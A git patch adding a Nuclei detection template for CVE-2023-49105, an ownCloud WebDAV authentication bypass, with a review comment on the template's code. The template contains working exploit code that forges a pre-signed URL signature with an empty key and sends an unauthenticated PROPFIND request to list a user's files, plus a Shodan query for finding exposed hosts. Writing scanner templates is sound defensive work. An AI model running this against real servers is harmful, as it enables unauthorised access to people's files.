From 93af58aada6757849aa8f9ff1ec82d38349fc7ea Mon Sep 17 00:00:00 2001
From: chrisusdag <153892655+chrisusdag@users.noreply.github.com>
Date: Fri, 15 Dec 2023 14:48:22 +0100
Subject: [PATCH] CVE-2023-49105 (#8835)
* Create cve-2023-49105.yaml
* Update cve-2023-49105.yaml
---
 code/cves/2023/cve-2023-49105.yaml | 88 ++++++++++++++++++++++++++++++
 1 file changed, 88 insertions(+)
 create mode 100644 code/cves/2023/cve-2023-49105.yaml
diff --git a/code/cves/2023/cve-2023-49105.yaml b/code/cves/2023/cve-2023-49105.yaml
new file mode 100644
index 0000000000..88fadc7480
--- /dev/null
+++ b/code/cves/2023/cve-2023-49105.yaml
@@ -0,0 +1,88 @@
+id: CVE-2023-49105
+
+info:
+ name: OwnCloud - WebDAV API Authentication Bypass
+ author: ChristianPoeschl,FlorianDewald,usdAG
+ severity: critical
+ description: |
+ An issue was discovered in ownCloud owncloud/core before 10.13.1. An attacker can access, modify, or delete any file without authentication if the username of a victim is known, and the victim has no signing-key configured. This occurs because pre-signed URLs can be accepted even when no signing-key is configured for the owner of the files. The earliest affected version is 10.6.0.
+ reference:
+ - https://owncloud.com/security-advisories/webdav-api-authentication-bypass-using-pre-signed-urls/
+ - https://github.com/0xfed/ownedcloud
+ - https://owncloud.org/security
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2023-49105
+ cwe-id: CWE-287
+ epss-score: 0.00091
+ epss-percentile: 0.38353
+ cpe: cpe:2.3:a:owncloud:owncloud:*:*:*:*:*:*:*:*
+ metadata:
+ verified: true
+ max-request: 2
+ vendor: owncloud
+ product: owncloud
+ shodan-query: title:"owncloud"
+ tags: cve,cve2023,owncloud,code,auth-bypass
+
+variables:
+ username: admin
+
+code:
+ - engine:
+ - py
+ - python3 # requires python to be pre-installed on system running nuclei
+ source: |
+ # build signature for presigned urls
+ import base64, hashlib, datetime, os
+ from urllib.parse import urlencode
+
+ username = os.getenv('username')
+ base_url = os.getenv('BaseURL')
+ dav_url = f'{base_url}/remote.php/dav/files/{username}'
+ oc_date = datetime.datetime.now().strftime('%Y-%m-%dT%H:%M:%SZ')
+ data = {
+ 'OC-Expires': '991200',
+ 'OC-Verb': 'PROPFIND',
+ 'OC-Credential': username,
+ 'OC-Date': oc_date
+ }
+ sig_url = f'{dav_url}?{urlencode(data)}'
+ # derive signature from empty sign key
+ dk = hashlib.pbkdf2_hmac('sha512', sig_url.encode(), b'', 10000, dklen=32)
+ final_url = f'/remote.php/dav/files/{username}?{urlencode(data)}&OC-Signature={dk.hex()}'
+ #final_url = f'{sig_url}&OC-Signature={dk.hex()}'
+ print(final_url)
+
+http:
+ - raw:
+ - |
+ PROPFIND {{code_response}} HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: text/xml
+ Authorization: Basic {{base64('{{username}}')}}
+
+ matchers-condition: or
+ matchers:
+ - type: dsl
+ name: bypass-correct-user
+ dsl:
+ - status_code == 207
+ - contains(body, 'owncloud.org')
+ condition: and
+
+ - type: word
+ name: bypass-wrong-user
+ part: body
+ words:
+ - User unknown
+ - Sabre
+ - Exception
+ - NotAuthenticated
+ condition: and
+
+ extractors:
+ - type: dsl
+ dsl:
+ - '"Username => "+ username'
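Review bot: `oc_date` in the embedded Python source is taken from `datetime.datetime.now()`, which is the scanner host's local time, yet it is formatted with a literal `Z` suffix, so the OC-Date the server verifies is labelled UTC while actually carrying the local offset; use `oc_date = datetime.datetime.now(datetime.timezone.utc).strftime('%Y-%m-%dT%H:%M:%SZ')` so the timestamp matches its designator regardless of where nuclei runs. In the same snippet `base64` is imported but never used (the Basic header is encoded by the DSL `base64()` call in the http section), and the commented-out `#final_url = f'{sig_url}&OC-Signature=...'` alternative should be removed rather than shipped. The `bypass-wrong-user` matcher flags any body containing `User unknown`, `Sabre`, `Exception` and `NotAuthenticated`; nothing in the template shows that a patched 10.13.1 instance answers an unknown user differently, so that branch is worth confirming against a fixed host before it counts as a positive.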